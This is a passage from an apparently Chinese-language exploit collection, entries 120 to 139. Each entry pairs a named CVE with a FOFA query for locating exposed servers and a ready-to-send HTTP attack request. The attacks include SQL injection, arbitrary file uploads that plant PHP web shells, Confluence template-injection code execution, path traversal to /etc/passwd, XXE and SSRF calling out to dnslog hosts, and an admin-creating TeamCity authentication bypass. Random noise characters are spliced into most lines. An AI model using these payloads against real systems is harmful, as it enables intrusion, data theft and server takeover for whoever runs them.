2 ]! W" z3 e1 bX-Remote-Addr: 1.1.1.1
- c( P& X4 w! @) G E. w1 K; MTe: trailers
# g) X7 m L, x* m; h2 C. dConnection: close4 A2 B- \. R- W# b' I
8 O1 J ]* \6 g Osrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456! o4 _7 r3 b' [5 J
6 B& C' o% {; f( ~+ f( \0 a
( C2 a5 b/ F3 m3 A$ U7 A) m120. 北京百绰智能S40管理平台导入web.php任意文件上传
; }/ Y/ M: X# H9 g; ICVE-2024-12531 {* b1 B$ E' j$ ?
FOFA:title="Smart管理平台". F% W5 [# u2 Z5 J5 X
POST /useratte/web.php? HTTP/1.1
( _, _6 U! A% v& F$ dHost: ip:port6 i5 Q9 `0 l1 L+ {# R
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
# [* H4 D2 H; S7 c- o0 I7 ]6 xUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko& L; _) T; H6 [' C, B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: j6 k6 ], O2 w: k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ x2 S p. s) |- ?. MAccept-Encoding: gzip, deflate
2 l. Y, r; U, L3 s2 @5 rContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328* _8 d+ U1 r7 X4 S& _
Content-Length: 597
: o$ r/ k0 W; b+ q: l& T5 i2 V0 nOrigin: https://ip:port
& W4 V& {- g$ M6 pReferer: https://ip:port/sysmanage/licence.php
# m% N- ~% m& P% T! L* hUpgrade-Insecure-Requests: 1$ A9 k! c1 ~ P& l6 V. |- H& s; b
Sec-Fetch-Dest: document1 o) }; w, v3 o# G
Sec-Fetch-Mode: navigate- B2 c; X3 L2 y3 K/ U& s
Sec-Fetch-Site: same-origin
0 ~: Y& d; m6 Q' d$ `- i0 k: v" U5 ^# }* ^Sec-Fetch-User: ?17 t; I% q# i3 K: ?7 d6 m8 \. f
Te: trailers
0 c3 @) q! ?8 a8 NConnection: close Y3 d4 L% f2 I
. u1 Y. w! O8 `) l" t, U* S-----------------------------42328904123665875270630079328
+ v9 H* k9 w% t$ o, ]$ Y) G' tContent-Disposition: form-data; name="file_upload"; filename="2.php"
: m" G; t8 J* g+ A% r+ q6 SContent-Type: application/octet-stream6 c6 M- [# S. m2 j
z- i9 g1 z H" z0 F. P S<?php phpinfo()?> a6 H2 N( v) | N6 F. { U5 M! k
-----------------------------42328904123665875270630079328
& k& K/ j( T3 s5 k1 g1 f& k+ nContent-Disposition: form-data; name="id_type"
% P9 O; a' z- P: q6 {/ A9 P1 P) s/ F- z2 |3 o% j
1( e5 y/ \7 Z6 H8 \' i
-----------------------------423289041236658752706300793283 H5 b, K$ Z7 a5 q: b' ?
Content-Disposition: form-data; name="1_ck"2 O5 U9 r& G A( j3 A, E6 T
$ r6 T9 {% Q. B: L
1_radhttp8 `$ w: v9 X# y
-----------------------------423289041236658752706300793286 w1 @1 e$ l& ~" i" W* g
Content-Disposition: form-data; name="mode"
! P4 V' s( a& t& S/ A" o
8 S& Z/ s, {. _# A: {5 B% P, t1 Zimport
: B% N/ _2 ]& ~( w: y6 g& P-----------------------------42328904123665875270630079328
5 ?, d, \' H3 _. f& l% Y7 O5 }( u5 }2 Z- x1 ]. |" g; l0 w
* |9 t* l e9 V' {
文件路径/upload/2.php, k; H0 ^6 v+ F" t2 j% \
! l$ o' y, J7 c9 ?121. 北京百绰智能S42管理平台userattestation.php任意文件上传
( {7 j7 [2 R3 W. ]8 ^' x9 o) R) e9 jCVE-2024-19185 S: q& g" H1 H, k' q( m9 D0 S- u" v
FOFA:title="Smart管理平台"
8 ~( z9 h( f( b+ q3 k5 g8 LPOST /useratte/userattestation.php HTTP/1.1! ^! P g) W3 E+ x/ F% v0 c* n
Host: 192.168.40.130:8443
6 X" _# [! n$ o/ HCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
8 x) C' i; O& w% }( j) }) b" p5 QUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko) v( q3 G% L6 @" o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, V1 `0 p, p: g, c! {. [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: w) x& Q: E( L/ X" O7 ]( X! E
Accept-Encoding: gzip, deflate
9 @7 w9 B* J5 e3 W& L% ^6 @+ [2 B6 fContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
6 \+ t. n3 r; Q: M; L! F( m6 k- m, ?; iContent-Length: 5920 B5 D' S$ H9 }; o5 L
Origin: https://192.168.40.130:8443
- r6 v: r3 S: sUpgrade-Insecure-Requests: 1% l! U/ j$ s1 q- f" |
Sec-Fetch-Dest: document
7 k, |! e% f& m. ^" t9 a0 v. O/ y+ sSec-Fetch-Mode: navigate) M E9 x. F0 u" ~9 A9 ?2 d5 Q! O( s" x' k
Sec-Fetch-Site: same-origin
' O# c3 s( p# {7 v3 }1 d! USec-Fetch-User: ?1
: e7 t/ D! J% m7 U1 J, `Te: trailers6 U* m1 z8 g& e: _& ?* h/ w
Connection: close
2 B0 Z( I+ u, S3 v K# u7 {+ a3 R& h- F2 C7 b- s
-----------------------------42328904123665875270630079328
6 C7 d8 @; f2 q7 f- i9 I( mContent-Disposition: form-data; name="web_img"; filename="1.php"2 h j f! s; ^* @/ R
Content-Type: application/octet-stream9 \1 w9 ^' z5 I# r
* B; e! E$ z9 U& v( K, Z# \<?php phpinfo();?>
+ f. S0 r$ j! W; `& ^4 Z$ M' V-----------------------------423289041236658752706300793287 n+ n9 m2 Z$ `4 ?+ Y
Content-Disposition: form-data; name="id_type"$ {% V' c7 \ g- r$ v
: y7 k* f: Y/ j5 b# C) C# S1+ D$ @- u. @" V, j7 O* s7 K
-----------------------------423289041236658752706300793280 J$ e# U6 O0 {9 F7 h
Content-Disposition: form-data; name="1_ck"& B- n) N! S- O/ n) Z7 R
7 u* j8 }( }- n5 s2 q$ R& M+ q1_radhttp
# Q& r# \. _# k( ~0 O b-----------------------------42328904123665875270630079328- u1 ]6 l4 A$ w" \3 \
Content-Disposition: form-data; name="hidwel"
: n3 v- V- u2 ]
$ m% ~4 Y& r8 u# D1 ?) K" T qset
7 J% x, o3 a+ }-----------------------------42328904123665875270630079328; Y. U+ T) s* s
& W9 W) X, D0 [* L9 Y0 S+ ~; n- X( z' x" w' U# k
boot/web/upload/weblogo/1.php4 [/ g7 [8 y- `9 ^" y2 @ L
4 O, ]2 W& o+ y122. 北京百绰智能s200管理平台/importexport.php sql注入8 l; z0 T% w0 o7 q. C
CVE-2024-27718FOFA:title="Smart管理平台"; D. o& n1 A: w) O( ?# `7 X
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()! ?& i7 N/ X, M# b5 R4 g
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.18 e9 K4 n$ T& Q. ~. v0 P
Host: x.x.x.x
. F- P, m0 T3 @" v3 M+ ^Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0' p q5 L. `6 O7 ^1 T& G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 Z o8 t; q5 E, e" u; p/ J. AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 ]) A0 ~# l* l j0 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& ?- H( T% J( j8 j; p I; z, u' K
Accept-Encoding: gzip, deflate, br0 H- T2 l' h3 n
Upgrade-Insecure-Requests: 1
8 K1 ` A7 Z, c6 K0 g# S7 u3 TSec-Fetch-Dest: document# R7 Q# `& M: i8 j/ f# t" m
Sec-Fetch-Mode: navigate
9 z |8 ~ f$ Y% d9 aSec-Fetch-Site: none
1 |5 r/ f# e' ]& f- ^Sec-Fetch-User: ?1
/ ^$ \: p i4 b; S; R, jTe: trailers0 c; }* c4 R+ B
Connection: close
! ]0 M& P; J) A6 i4 L- I: N7 |( c
- h2 |- A' B) o/ ~) O
: [" }5 T6 |$ y4 s; a123. Atlassian Confluence 模板注入代码执行# s& l J+ T) ~, F. ] [
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"$ @+ E4 `" m1 p& Q
POST /template/aui/text-inline.vm HTTP/1.1
& r$ F0 W6 a2 ]' F: aHost: localhost:8090
1 a6 G. [& b4 y, u e. D6 wAccept-Encoding: gzip, deflate, br* w& B1 n* n0 A# n
Accept: */*
7 p( n$ `* W0 JAccept-Language: en-US;q=0.9,en;q=0.8
- a- E3 X/ G; l8 H& @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
5 P( v" E: ?7 B+ k8 nConnection: close9 d" ?0 s) f: ]+ z( A/ |
Content-Type: application/x-www-form-urlencoded0 H7 X+ p' q$ C! H% i$ ?, l
9 ~# z% U8 }7 h; c1 J9 u% m' w3 xlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
, ~; v, v" G- i& T/ v9 a8 c+ I& }% S9 P4 t) P
6 w& \5 K1 K7 C$ @
124. 湖南建研工程质量检测系统任意文件上传
3 c: y! J+ l3 p5 A* NFOFA:body="/Content/Theme/Standard/webSite/login.css"' p% c2 i9 S3 v5 [+ @6 d
POST /Scripts/admintool?type=updatefile HTTP/1.1
( r7 ^$ L7 g; o9 I1 dHost: 192.168.40.130:8282% F" |& N1 v9 m% ]8 N' F' S
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
8 O% v0 H3 m- ^2 O9 ]# [: ^8 y" PContent-Length: 72
/ j Q+ O, H! y* A( oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' b! I7 X+ @; o: @( ^$ o% ]
Accept-Encoding: gzip, deflate, br
* [+ l" d) p; ?: }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- }; B; }/ Q' v( O; s& s
Connection: close8 U/ \1 M' M! L' E$ @3 g' J
Content-Type: application/x-www-form-urlencoded
0 A: T7 U& i' F, Z6 h4 Q- g
, v' s# ~1 ^7 A! H, d3 kfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
; ]5 E+ l, z$ s- r" {) n; ~
1 B* }5 b8 ^& S+ s- }
$ R) t' O! x7 M) N; e1 Z0 Zhttp://192.168.40.130:8282/Scripts/abcgcg.aspx- z3 I7 B1 K8 x
# W. Q$ F7 M# Y3 M
125. ConnectWise ScreenConnect身份验证绕过
# M8 I( n" c' l7 g" fCVE-2024-1709/ f$ q6 q1 n3 ]
FOFA:icon_hash="-82958153": D; Y" p: H2 Z7 n! H
https://github.com/watchtowrlabs ... bypass-add-user-poc1 w; g8 {8 Q0 z/ ^
5 W! v$ L: l5 U& K9 I
/ G: o8 U) C6 b* a: T) R% f
使用方法: D" ?" T- W+ Y; V& G
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
' q9 i( y7 n( T- s0 o2 d9 S
+ p5 i% i6 v8 V; a* X6 q9 n
5 O' y* K4 V9 o6 b# t1 L: P7 }创建好用户后直接登录后台,可以执行系统命令。
$ I/ U6 ]( `3 m" S- N( y# r8 b' H" j8 {
126. Aiohttp 路径遍历8 j5 A- m: c( I4 D& q: Y1 P+ Q
FOFA:title=="ComfyUI"! s7 V B: }$ B7 E- _! T6 J
GET /static/../../../../../etc/passwd HTTP/1.1
, W# E$ j) W2 m" k7 e9 j! OHost: x.x.x.x
' \ n# | e7 C* p MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
8 j0 r% W$ Y1 V5 [( \Connection: close9 R/ D" W( j( L1 R2 R8 s
Accept: */** t" X- w2 B/ Y6 {1 Z8 S
Accept-Language: en
. F+ ]7 G# D: |: c% F, @( H9 tAccept-Encoding: gzip
! K, A2 O: U: X/ T! E& U- D
$ l& U3 |" b9 i: `% |" v/ Z
- _8 g; f, G6 d2 J2 W7 Q$ n! o127. 广联达Linkworks DataExchange.ashx XXE
5 |$ b$ Z7 D/ ?FOFA:body="Services/Identification/login.ashx" + V% Y; R" i3 c& E
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
: A7 w4 b( q- ~. P- `; l SHost: 192.168.40.130:8888% z, h, E* A, R0 g0 x) N. r& q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
+ t" a9 p9 G# I, A4 E$ xContent-Length: 4150 p8 Y# Z) J; h# Y/ ?' V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 O: L, D3 q" q$ s- C" P8 u
Accept-Encoding: gzip, deflate6 _" O" f: p( @! x6 o
Accept-Language: zh-CN,zh;q=0.98 ?; W" o4 g9 o) F, x
Connection: close
* s! G1 Y9 x) Y8 Y% `: mContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe06 i9 Y: |% U& c$ L' C
Purpose: prefetch
# r2 G' @6 K/ o& X3 NSec-Purpose: prefetch;prerender3 A6 o* A1 ]" Q( I0 H! [
* `; P4 G7 \5 v0 }. O8 O
------WebKitFormBoundaryJGgV5l5ta05yAIe0
1 j5 h6 G3 P8 d0 [Content-Disposition: form-data;name="SystemName"" P, d/ {+ d0 y; ^0 I
' g6 o0 q- o4 |* t' HBIM
: Q% O+ l. p' u8 I------WebKitFormBoundaryJGgV5l5ta05yAIe0
8 h5 z4 A, S, ?1 | X2 k+ q2 I4 pContent-Disposition: form-data;name="Params"1 l- B/ [+ j: ]# q- |8 Y( P9 }
Content-Type: text/plain
& p4 F; A% Q7 h* \7 W5 A1 Y7 ?+ ]. T: @# h3 n
<?xml version="1.0" encoding="UTF-8"?>' N I/ \; A! P8 }2 `3 ~* F; Q
<!DOCTYPE test [
6 \- S4 ]( ~5 h1 [<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">. y. R( A0 V3 D8 z$ ?' K8 \; |
]
0 f4 o3 ?: M: B) w>
8 Q0 F5 ~3 @# S2 \$ w* m<test>&t;</test>
3 R3 u, p# c- a, O3 ?/ x5 k------WebKitFormBoundaryJGgV5l5ta05yAIe0--/ }7 A9 a& g. F0 u6 v# K1 O4 \$ Z/ Z" v
G. B" U1 z0 c4 L( v$ r) N
4 ]6 {9 L; L$ ~
; j& V7 m( I o4 Z128. Adobe ColdFusion 反序列化
& [9 R" } s3 iCVE-2023-382039 y" w0 o4 b6 ^6 A7 w! @5 A$ y. s
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)! \. z9 m, c( |0 F( b
FOFA:app="Adobe-ColdFusion"
7 h2 J# o( N7 APAYLOAD
' b9 Q2 v' ~# w5 u( Z' c3 @ h/ Z2 n, o( _. l
129. Adobe ColdFusion 任意文件读取
. U b9 O7 y- i U/ D lCVE-2024-20767+ ^9 ]0 b+ k/ K' p @
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"9 M# q- ?# ], I! u. A
第一步,获取uuid
9 b, s3 B( f8 Y+ \9 v- DGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
% u- V2 z; H1 L( H1 _Host: x.x.x.x
+ r4 o% L+ F( B3 x! v: {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.360 G$ C( K6 R0 c
Accept: */* O7 M5 L0 D" ~/ c- R1 U+ H
Accept-Encoding: gzip, deflate# ], n- m/ R# H4 l" |9 S4 F- H
Connection: close0 I. x3 j' l) M/ U( _- g) U
* z% l2 D' ]! r$ `1 m& C2 y$ D
# Q0 E' I8 U% {! U, n4 ~0 R第二步,读取/etc/passwd文件
2 P0 Y$ \# S& ?- R1 wGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
; o. Z0 K5 a; L8 CHost: x.x.x.x, }6 }8 G& c% K2 U: J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
/ s3 U4 I7 B9 P4 C2 AAccept: */*7 j1 q1 w0 h9 ]: E1 i' u
Accept-Encoding: gzip, deflate: _/ w9 a' o( W& L! z& h
Connection: close
( Z8 z: K' a! suuid: 85f60018-a654-4410-a783-f81cbd5000b9
& z0 z, c& i" m
( r/ S# u: Y; w p
6 o; n, z7 T9 F( \4 }& }130. Laykefu客服系统任意文件上传 c: t9 a$ L1 z0 M# ~
FOFA:icon_hash="-334624619"; h7 l" N6 V4 t6 g2 u
POST /admin/users/upavatar.html HTTP/1.1
+ N& r7 c: V6 O: XHost: 127.0.0.1
, N8 m1 Q+ ^ |" n0 X. gAccept: application/json, text/javascript, */*; q=0.015 ~ P; x1 y% y9 n
X-Requested-With: XMLHttpRequest
/ s% ^/ M3 J8 _/ [ C1 HUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26- Z% D0 s, u ~$ e# [7 d" x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR$ w/ a/ y5 F1 p ?
Accept-Encoding: gzip, deflate' t0 c) d5 W/ y
Accept-Language: zh-CN,zh;q=0.9
# B7 q' y" G) I. W# V, G4 OCookie: user_name=1; user_id=3- g- o) q7 |1 K9 c; v8 \+ f
Connection: close
' w. s: H/ \4 [$ Q1 H
. n+ D4 G: n% i- I4 q------WebKitFormBoundary3OCVBiwBVsNuB2kR
8 c; o4 a; K% E5 P: fContent-Disposition: form-data; name="file"; filename="1.php"
+ k* P# ^6 x2 U7 [4 tContent-Type: image/png" w, U1 ?9 u) x" O
# E, f% p8 W7 ~7 g: ]& \
<?php phpinfo();@eval($_POST['sec']);?>2 G. J/ v' `# g, u. b/ }
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
1 c9 H7 z- E! P& \6 P0 _9 J _: T8 [* u
+ B6 {2 A2 ^# E( m/ `131. Mini-Tmall <=20231017 SQL注入" i6 q& v# N% F! s! @' Q, K
FOFA:icon_hash="-2087517259"
j5 ]* I+ y s, O& L U后台地址:http://localhost:8080/tmall/admin
' E$ t! K p3 ?2 }( Rhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0); l, L2 ~) u4 L
: ?$ C$ s" b6 T% F# o132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
% ^- @& x! i: H! @( v' pCVE-2024-27198$ h. m8 O$ J; Q4 H. h9 F, c
FOFA:body="Log in to TeamCity": A& o1 k6 f! v) o. v! ~9 z8 J
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
# g# U0 Y7 L/ R2 FHost: 192.168.40.130:8111
/ C5 z$ e2 x0 j; f y# G }# DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ E, V7 {( x9 U- }: {% b; U0 Q) \Accept: */*
* g* g' J! ]' W' D" ?4 X Z0 {Content-Type: application/json
0 G A$ `$ i1 @/ H x% o M3 ZAccept-Encoding: gzip, deflate
: V+ p; w: Q: p5 ?0 p( B! e3 h& P$ W# E0 ]- ]
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}% O. r" F* @5 V0 A% d6 X% o
0 a" R: [3 t' t1 C8 B' \+ O, u. s$ h$ P
' H% y L) o) ?7 CCVE-2024-27199: r @0 m+ N8 W, l# b7 ~% h3 O
/res/../admin/diagnostic.jsp
; O z u. V* i/.well-known/acme-challenge/../../admin/diagnostic.jsp
2 B6 p4 W- {: K" ]+ Y& ]2 [/update/../admin/diagnostic.jsp
9 ?% \7 l: O" c5 g% v/ K/ k6 a8 a# W2 I
) l: b- C6 H7 u; [; c7 E8 @2 r/ h3 F5 n
CVE-2024-27198-RCE.py
' \- R4 L* @/ z4 H2 A1 w! A1 I9 N9 C+ g' ~$ m
133. H5 云商城 file.php 文件上传
: M' _9 N) ]3 s3 K- [FOFA:body="/public/qbsp.php"( I1 K+ Q7 b- S5 x% u' H! n. y
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
$ A# A) y4 J% [$ p0 B) a! WHost: your-ip" d* P5 B( z+ ?" R* ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
' v1 L* \4 k# @Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx7 ^+ F# G& Y- E* a! y" r
4 l q7 E/ i- v4 y e------WebKitFormBoundaryFQqYtrIWb8iBxUCx
3 n5 T y9 g- Q V& FContent-Disposition: form-data; name="file"; filename="rce.php"7 ~. F' e: n4 J! ~* ~* }
Content-Type: application/octet-stream
0 B$ b$ `5 d. l( o7 _: k: {
7 N2 Y4 a$ B- N<?php system("cat /etc/passwd");unlink(__FILE__);?>
" c: J" l& ~) V8 h------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
; |& U" J& T T- l) `* Y. a0 i
6 b, e- @; Q% W5 b5 v: B
# i3 f9 k* ^+ G% [7 R& h$ J @6 ?
134. 网康NS-ASG应用安全网关index.php sql注入, U' Z$ }; g: q- G/ Z/ Y
CVE-2024-2330
8 m9 I6 E& g: b* }Netentsec NS-ASG Application Security Gateway 6.3版本! Z3 w) h [. `4 z
FOFA:app="网康科技-NS-ASG安全网关"
+ \* X; k1 J7 j. B" J4 o$ oPOST /protocol/index.php HTTP/1.1
5 s; n M+ Q5 J1 sHost: x.x.x.x
V3 N8 @2 ]4 {: G! n% A, Y8 zCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de1 I6 X5 N7 d4 @ c$ o" L, v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
4 T% ]4 [- Z) b6 i9 ~0 Q1 N! tAccept: */*( z# H+ d( b: U9 b7 d. E1 E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; u# k+ W/ o5 {Accept-Encoding: gzip, deflate. X9 F- g- y4 u7 l
Sec-Fetch-Dest: empty5 x4 h8 H2 b+ K: c6 Y; `' j8 w
Sec-Fetch-Mode: cors: h0 V) Q$ D5 @3 Q7 |) e2 S$ U( W
Sec-Fetch-Site: same-origin( _, G$ N. d- }" \
Te: trailers
9 c* _7 ?# p) c5 H3 {! t" TConnection: close
5 @9 p5 Y5 v' d1 R; z3 rContent-Type: application/x-www-form-urlencoded
8 w' e8 m) l$ q% U- {Content-Length: 263
8 m c3 G# b" o: s- k
# Z- i! p' P S8 ?" ?jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
6 z' G5 x6 @; L' K7 ~+ n
3 w* q9 V( U. L$ o. A7 O: s" }% p8 B4 |. V+ {8 g$ E( d
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入. ^& L+ `2 Q& Z8 l; C4 X; a( i
CVE-2024-2022
$ ~; h5 ?- w0 SNetentsec NS-ASG Application Security Gateway 6.3版本! k+ U# @2 B u* R; ?, d
FOFA:app="网康科技-NS-ASG安全网关"
9 ~1 P0 U3 {5 _. Z( Y; _GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
. K! N; J: z, u' h4 aHost: x.x.x.x7 z2 w& b& J/ G8 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36- ^7 L. Y. V; O$ G: T9 B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 f% G+ E4 Q5 u
Accept-Encoding: gzip, deflate L+ x/ x, R$ N) s X) P6 O0 }( J
Accept-Language: zh-CN,zh;q=0.93 H" t- e1 m5 C& ]/ E4 }
Connection: close- W" M0 z6 ]! V z9 S+ a
7 h2 X" M5 M$ M1 C" J( `8 n3 ~* B/ Y# s& {+ b. w
136. NextChat cors SSRF
3 Q+ _: p6 x. q& w0 a& d2 lCVE-2023-49785
; \4 I& R9 K [. d- GFOFA:title="NextChat"
4 \. u0 j# K. I5 c( N6 n! HGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.15 g% b ?( O8 G2 U' x/ R# D
Host: x.x.x.x:100006 B& F6 O$ P1 x" p2 M
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! L3 H$ w1 }8 kConnection: close
. o) ]+ B2 y* lAccept: */*" s% c( Y4 q& u/ X0 {* s2 \4 R; f* B
Accept-Language: en- g9 A' G# Z+ u/ T* v' X
Accept-Encoding: gzip7 y9 B c& q, K. y
' `0 F' }" n: o8 P% ?1 b( f- l/ A! B L* C8 Z: h% |3 N
137. 福建科立迅通信指挥调度平台down_file.php sql注入- N1 F+ g# F0 w" b# i
CVE-2024-2620
7 U& B# l* S- z& p) qFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
$ V8 f5 I% b# y7 d9 T/ S) LGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1- ?3 U& ]1 }. K/ D* ~
Host: x.x.x.x
! ^; H- d# e( y D: I) aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
( U0 n2 Y/ k" i+ MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& Z6 v" k. l7 CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# X# {% j6 j- _" R& Z, FAccept-Encoding: gzip, deflate, br U* W! Z3 B" x! q( |; k+ n6 }
Connection: close" I8 \9 E% L6 E
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj* N( o% ~; O( Q' }- Q0 Z: [' J
Upgrade-Insecure-Requests: 1
. ^+ F8 X! Z5 V3 N- J& l2 O, M7 Z' M7 k* t7 A
3 V; m* Q! `/ ^! p: g8 h% B
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入! j& ]/ X+ I+ w, Z/ k
CVE-2024-2621 _1 x; C" z& G' _! Y3 X* @7 `
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"+ I% n# N% K0 F
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.17 h6 i1 D" y, T: x* M2 i7 x
Host: x.x.x.x( b0 h1 T5 H, Q( c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
- L0 k& C! v# W* a: _8 K1 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( i+ a/ g ^% E) h# Q' Z$ sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 x; u m0 I1 g+ l$ m% \1 r
Accept-Encoding: gzip, deflate, br( l2 L% |" I/ B: Y9 b
Connection: close3 a" C# g6 s3 o: \& z% Z1 j
Upgrade-Insecure-Requests: 1
# x# D( N$ y4 J, n, d! g: i+ l2 m0 Z4 g$ D& v" i' U6 c5 }; o
& e/ R; r( _, J6 A1 O' k139. 福建科立讯通信指挥调度平台editemedia.php sql注入2 ?4 Q B [ s8 K
CVE-2024-2622
